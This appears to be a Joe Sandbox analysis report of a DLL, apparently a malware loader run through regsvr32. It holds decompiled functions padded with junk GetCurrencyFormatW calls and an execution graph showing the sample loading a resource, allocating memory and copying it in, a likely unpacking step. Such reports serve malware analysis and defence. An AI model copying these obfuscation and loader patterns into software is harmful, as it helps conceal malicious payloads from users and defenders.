                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 3037d2a31e13cd60ae94bf8572a488b6c64541d9a0000086c5ac0b5ac173194a
                                                                                                            • Instruction ID: 41eada4d2328894fcd37416b6f2f2abe75c7e90fa58e6643f2faad819eee2c9b
                                                                                                            • Opcode Fuzzy Hash: 3037d2a31e13cd60ae94bf8572a488b6c64541d9a0000086c5ac0b5ac173194a
                                                                                                            • Instruction Fuzzy Hash: 42E0B6B5A50208BFE705CB88DDD6FCABBB8EB09705F114055F705EB691D3B0AA508A64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001DE9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10001DE9(void* __esi, intOrPtr _a4) {

				return GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  !(__esi - 1) & _a4 + __esi - 0x00000001;
			}



                                                                                                            0x10001e1f

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001E01
                                                                                                            Strings
                                                                                                            • xadqsavcbdfewescGADW, xrefs: 10001DEE
                                                                                                            • eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001DF5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 24238ad2289803ca50e9d90b58c44b5b7125c6c52a1704e1df8113e70dde896a
                                                                                                            • Instruction ID: a6bb75da600a1c00fcd3d833fe1878cb6779512402ee289b34badc6351d60fc0
                                                                                                            • Opcode Fuzzy Hash: 24238ad2289803ca50e9d90b58c44b5b7125c6c52a1704e1df8113e70dde896a
                                                                                                            • Instruction Fuzzy Hash: 83D09E75388202AEF619C740CD97FD5B754A755706F11800CF346EE5D1CBA651558B14
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001DB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10001DB6(signed int _a4, intOrPtr _a8) {

				return GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  !(_a8 - 1) & _a4;
			}



                                                                                                            0x10001de8

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001DCE
                                                                                                            Strings
                                                                                                            • xadqsavcbdfewescGADW, xrefs: 10001DBB
                                                                                                            • eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001DC2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 0603a27c0e74e74ad8478d6043813fb474373adc01802646cc0a30f63cb7563e
                                                                                                            • Instruction ID: 693cd55018ed01a535ded29b615326f2d298561c8c1b69a974d3bac9f79f4422
                                                                                                            • Opcode Fuzzy Hash: 0603a27c0e74e74ad8478d6043813fb474373adc01802646cc0a30f63cb7563e
                                                                                                            • Instruction Fuzzy Hash: CED0C9753887017AFA09D741DE97FC6B750E795B06F019008F749EE5D1CBB890408F15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001E20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E10001E20(void* _a4, intOrPtr _a8) {
				signed int _t3;

				_t3 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				asm("sbb eax, eax");
				return _t3 *  *0x100440cc + _a8 + 1;
			}




                                                                                                            0x10001e38
                                                                                                            0x10001e4d
                                                                                                            0x10001e50

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001E38
                                                                                                            Strings
                                                                                                            • xadqsavcbdfewescGADW, xrefs: 10001E25
                                                                                                            • eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001E2C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 0a1407d9348c296fdcc7bcf98010ffebdc07ebe8e058d4ddbfe9a3e4d9e1a88e
                                                                                                            • Instruction ID: 3fdeccdcda24fa04b64c34d0073cfd5bdbdd3e77499752cdea2f7536024f9e24
                                                                                                            • Opcode Fuzzy Hash: 0a1407d9348c296fdcc7bcf98010ffebdc07ebe8e058d4ddbfe9a3e4d9e1a88e
                                                                                                            • Instruction Fuzzy Hash: 2DD0C931298311BAE2059B60CD86F86B794E756B07F01C514F345EE4D1C7B090848A25
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10003854 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 12windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10003854(void* __ecx) {

				E1000EE6D(__ecx, 0x3e9, "Mundo Hola");
				return SendMessageA( *(__ecx + 0xe8), 0x143, 0, "Hola Mundo");
			}



                                                                                                            0x10003861
                                                                                                            0x1000387f

                                                                                                            APIs
                                                                                                              • Part of subcall function 1000EE6D: SetDlgItemTextA.USER32 ref: 1000EE7E
                                                                                                            • SendMessageA.USER32(?,00000143,00000000,Hola Mundo), ref: 10003878
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemMessageSendText
                                                                                                            • String ID: Hola Mundo$Mundo Hola
                                                                                                            • API String ID: 77679052-617527613
                                                                                                            • Opcode ID: 9efbd6bab9b2c24e09a89c3a740a4acb6358833262dbac47d79fc435f75e038e
                                                                                                            • Instruction ID: 1811b1191abaef19ada81be914ca39904a3dc6a32a47f6b2494c466348ef455e
                                                                                                            • Opcode Fuzzy Hash: 9efbd6bab9b2c24e09a89c3a740a4acb6358833262dbac47d79fc435f75e038e
                                                                                                            • Instruction Fuzzy Hash: D2C080301403A07FF5226250FC06FCA5910CB05753F008501730D7D0D18B5139804640
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10011382 Relevance: 5.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E10011382(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E10004E6E(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x10048670 == 0) {
					_t4 = E1001135E();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x10048828 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x10048810);
					if( *_t15 == 0) {
						_t4 = 0x10048678 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x10048810);
				}
				EnterCriticalSection(0x10048678 + _t11 * 0x18);
				return _t4;
			}











                                                                                                            0x10011382
                                                                                                            0x10011382
                                                                                                            0x10011382
                                                                                                            0x10011383
                                                                                                            0x10011387
                                                                                                            0x1001138a
                                                                                                            0x1001138c
                                                                                                            0x1001138c
                                                                                                            0x10011398
                                                                                                            0x1001139a
                                                                                                            0x1001139a
                                                                                                            0x1001139f
                                                                                                            0x100113a6
                                                                                                            0x100113a7
                                                                                                            0x100113a8
                                                                                                            0x100113b7
                                                                                                            0x100113be
                                                                                                            0x100113c3
                                                                                                            0x100113ca
                                                                                                            0x100113cd
                                                                                                            0x100113d3
                                                                                                            0x100113d3
                                                                                                            0x100113da
                                                                                                            0x100113da
                                                                                                            0x100113e6
                                                                                                            0x100113ec

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113BE
                                                                                                            • InitializeCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113CD
                                                                                                            • LeaveCriticalSection.KERNEL32(10048810,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113DA
                                                                                                            • EnterCriticalSection.KERNEL32(10003840,?,?,?,?,10010672,00000010,00000008,1000EC37,1000EBDA,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100113E6
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2895727460-0
                                                                                                            • Opcode ID: 5a71d8f3468c054b32200986d24b874c32abe560b93976940e53b78127281ca9
                                                                                                            • Instruction ID: 2a1b714fc97c26e45b6e87192a60087c5aec0faa5666cee140badcbafd2b3ba5
                                                                                                            • Opcode Fuzzy Hash: 5a71d8f3468c054b32200986d24b874c32abe560b93976940e53b78127281ca9
                                                                                                            • Instruction Fuzzy Hash: BFF0F6735001288FD6409F54CC8475DB7AAFB82395F56482AE1508A056CF31D681C769
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100105F0 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100105F0(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x10048600
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}







                                                                                                            0x100105f2
                                                                                                            0x100105f5
                                                                                                            0x100105f5
                                                                                                            0x100105f9
                                                                                                            0x100105ff
                                                                                                            0x10010605
                                                                                                            0x1001062e
                                                                                                            0x1001062f
                                                                                                            0x00000000
                                                                                                            0x10010635
                                                                                                            0x10010607
                                                                                                            0x1001060a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001060e
                                                                                                            0x10010616
                                                                                                            0x00000000
                                                                                                            0x1001061d
                                                                                                            0x10010624
                                                                                                            0x00000000
                                                                                                            0x1001062a

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 100105F9
                                                                                                            • TlsGetValue.KERNEL32(100485E4,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001060E
                                                                                                            • LeaveCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 10010624
                                                                                                            • LeaveCriticalSection.KERNEL32(10048600,?,?,?,10010AB1,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001062F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Leave$EnterValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3969253408-0
                                                                                                            • Opcode ID: 79950d59dfa9a72b6c2f18be47bb30787cadad7b00379f75649d28e861df6bfe
                                                                                                            • Instruction ID: 62d6a443bb2e53cdd0c433372c742529333c02fcab520335ef35924ea7a93314
                                                                                                            • Opcode Fuzzy Hash: 79950d59dfa9a72b6c2f18be47bb30787cadad7b00379f75649d28e861df6bfe
                                                                                                            • Instruction Fuzzy Hash: C2F0127A3005109FD321CF64CC8884A73E9FFC839171A8866F8819B123DB71F895CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:3.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:453
                                                                                                            Total number of Limit Nodes:17
                                                                                                            execution_graph 26751 10003044 VirtualFree 26752 100209c7 26753 100209d3 26752->26753 26754 100209ce 26752->26754 26758 100208d1 26753->26758 26770 10027ed8 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 26754->26770 26757 100209e4 26760 100208dd __initptd 26758->26760 26759 1002092a 26767 1002097a __initptd 26759->26767 26825 100042f6 26759->26825 26760->26759 26760->26767 26771 100206f8 26760->26771 26764 1002095a 26765 100206f8 __CRT_INIT@12 164 API calls 26764->26765 26764->26767 26765->26767 26766 100042f6 ___DllMainCRTStartup 390 API calls 26768 10020951 26766->26768 26767->26757 26769 100206f8 __CRT_INIT@12 164 API calls 26768->26769 26769->26764 26770->26753 26772 10020822 26771->26772 26773 1002070b GetProcessHeap HeapAlloc 26771->26773 26775 10020828 26772->26775 26776 1002085d 26772->26776 26774 1002072f GetVersionExA 26773->26774 26801 10020728 26773->26801 26777 1002074a GetProcessHeap HeapFree 26774->26777 26778 1002073f GetProcessHeap HeapFree 26774->26778 26783 10020847 26775->26783 26775->26801 26981 10020e42 26775->26981 26779 10020862 26776->26779 26780 100208bb 26776->26780 26781 10020776 26777->26781 26778->26801 26992 10025cd2 7 API calls __decode_pointer 26779->26992 26780->26801 27022 10025fa9 81 API calls 2 library calls 26780->27022 26895 10024b73 HeapCreate 26781->26895 26783->26801 26990 10027859 70 API calls _realloc 26783->26990 26784 10020867 26993 1002695e 26784->26993 26789 100207ac 26789->26801 26905 10026012 GetModuleHandleA 26789->26905 26791 10020851 26991 10025cfc 6 API calls __decode_pointer 26791->26991 26798 100207be 26984 10024bcd VirtualFree HeapFree HeapFree HeapDestroy 26798->26984 26799 100207ba __RTC_Initialize 26799->26798 26802 100207cd GetCommandLineA 26799->26802 26801->26759 26938 10027bd1 26802->26938 26804 10020898 27008 10025d39 69 API calls 3 library calls 26804->27008 26805 100208af 27009 1001f6f4 26805->27009 26810 1002089f GetCurrentThreadId 26810->26801 26812 100207e7 26813 100207f2 26812->26813 26814 100207eb 26812->26814 26986 10027b18 113 API calls 3 library calls 26813->26986 26985 10025cfc 6 API calls __decode_pointer 26814->26985 26817 100207f7 26818 1002080b 26817->26818 26987 100278a5 112 API calls 6 library calls 26817->26987 26824 10020810 26818->26824 26989 10027859 70 API calls _realloc 26818->26989 26821 10020800 26821->26818 26988 10020cd1 76 API calls 4 library calls 26821->26988 26822 10020820 26822->26814 26824->26801 26826 10004317 26825->26826 26894 10004b3c 26825->26894 27087 100036fa 26826->27087 26829 1000431c 26831 10004324 31 API calls 26829->26831 26832 10004b5b 26829->26832 26830 10004b73 26830->26764 26830->26766 27093 10001534 GetCurrencyFormatW 26831->27093 27124 10020633 107 API calls 7 library calls 26832->27124 26836 10001534 ___DllMainCRTStartup 11 API calls 26837 100047f4 26836->26837 26838 10001534 ___DllMainCRTStartup 11 API calls 26837->26838 26839 1000481b 26838->26839 27101 10001688 12 API calls 26839->27101 26842 10001688 ___DllMainCRTStartup 16 API calls 26843 10004840 26842->26843 26844 10001688 ___DllMainCRTStartup 16 API calls 26843->26844 26845 10004853 26844->26845 26846 10001688 ___DllMainCRTStartup 16 API calls 26845->26846 26847 10004866 26846->26847 26848 10001688 ___DllMainCRTStartup 16 API calls 26847->26848 26849 10004879 26848->26849 26850 10001688 ___DllMainCRTStartup 16 API calls 26849->26850 26851 1000488c 26850->26851 26852 10001688 ___DllMainCRTStartup 16 API calls 26851->26852 26853 1000489f 26852->26853 26854 10001688 ___DllMainCRTStartup 16 API calls 26853->26854 26855 100048b2 26854->26855 26856 10001688 ___DllMainCRTStartup 16 API calls 26855->26856 26857 100048c8 26856->26857 26858 10001688 ___DllMainCRTStartup 16 API calls 26857->26858 26859 100048db 26858->26859 26860 10001688 ___DllMainCRTStartup 16 API calls 26859->26860 26861 100048ee 26860->26861 26862 10001688 ___DllMainCRTStartup 16 API calls 26861->26862 26863 10004901 26862->26863 26864 10001688 ___DllMainCRTStartup 16 API calls 26863->26864 26865 10004914 26864->26865 26866 10001688 ___DllMainCRTStartup 16 API calls 26865->26866 26867 10004927 26866->26867 26868 10001688 ___DllMainCRTStartup 16 API calls 26867->26868 26869 1000493a 26868->26869 26870 10001688 ___DllMainCRTStartup 16 API calls 26869->26870 26871 1000494d 26870->26871 26872 10001688 ___DllMainCRTStartup 16 API calls 26871->26872 26873 10004963 26872->26873 26874 10001688 ___DllMainCRTStartup 16 API calls 26873->26874 26875 10004976 26874->26875 26876 10001688 ___DllMainCRTStartup 16 API calls 26875->26876 26877 10004989 26876->26877 26878 10001688 ___DllMainCRTStartup 16 API calls 26877->26878 26879 1000499c 26878->26879 26880 10001688 ___DllMainCRTStartup 16 API calls 26879->26880 26881 100049af 26880->26881 26882 10001688 ___DllMainCRTStartup 16 API calls 26881->26882 26883 100049c2 26882->26883 26884 10001688 ___DllMainCRTStartup 16 API calls 26883->26884 26885 100049d5 FindResourceW LoadResource SizeofResource 26884->26885 26886 10004a84 GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW VirtualAlloc 26885->26886 26887 10004a2a GetCurrencyFormatW GetCurrencyFormatW GetCurrencyFormatW VirtualAllocExNuma 26885->26887 26888 10004ad9 memcpy malloc 26886->26888 26887->26888 27107 100018d8 GetCurrencyFormatW malloc GetCurrencyFormatW 26888->27107 26890 10004b14 27112 10001b36 13 API calls 26890->27112 26892 10004b2b ??3@YAXPAX 27113 100042ca 26892->27113 27116 1001fbb5 26894->27116 26896 10024b93 26895->26896 26897 10024b96 26895->26897 26896->26789 27023 10024b18 69 API calls 3 library calls 26897->27023 26899 10024b9b 26900 10024ba5 26899->26900 26901 10024bc9 26899->26901 27024 10024019 HeapAlloc 26900->27024 26901->26789 26903 10024baf 26903->26901 26904 10024bb4 HeapDestroy 26903->26904 26904->26896 26906 10026024 26905->26906 26907 1002602d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26905->26907 27025 10025cfc 6 API calls __decode_pointer 26906->27025 26909 10026077 TlsAlloc 26907->26909 26912 10026191 26909->26912 26913 100260c5 TlsSetValue 26909->26913 26912->26799 26913->26912 26914 100260d6 26913->26914 27026 10020e51 5 API calls 2 library calls 26914->27026 26916 100260db 27027 10025bfa TlsGetValue 26916->27027 26919 10025bfa __encode_pointer 5 API calls 26920 100260f6 26919->26920 26921 10025bfa __encode_pointer 5 API calls 26920->26921 26922 10026106 26921->26922 26923 10025bfa __encode_pointer 5 API calls 26922->26923 26924 10026116 26923->26924 27036 10023e72 69 API calls ___crtInitCritSecAndSpinCount 26924->27036 26926 10026123 26927 1002618c 26926->26927 26928 10025c66 __decode_pointer 5 API calls 26926->26928 27038 10025cfc 6 API calls __decode_pointer 26927->27038 26930 10026137 26928->26930 26930->26927 26931 1002695e __calloc_crt 69 API calls 26930->26931 26932 10026150 26931->26932 26932->26927 26933 10025c66 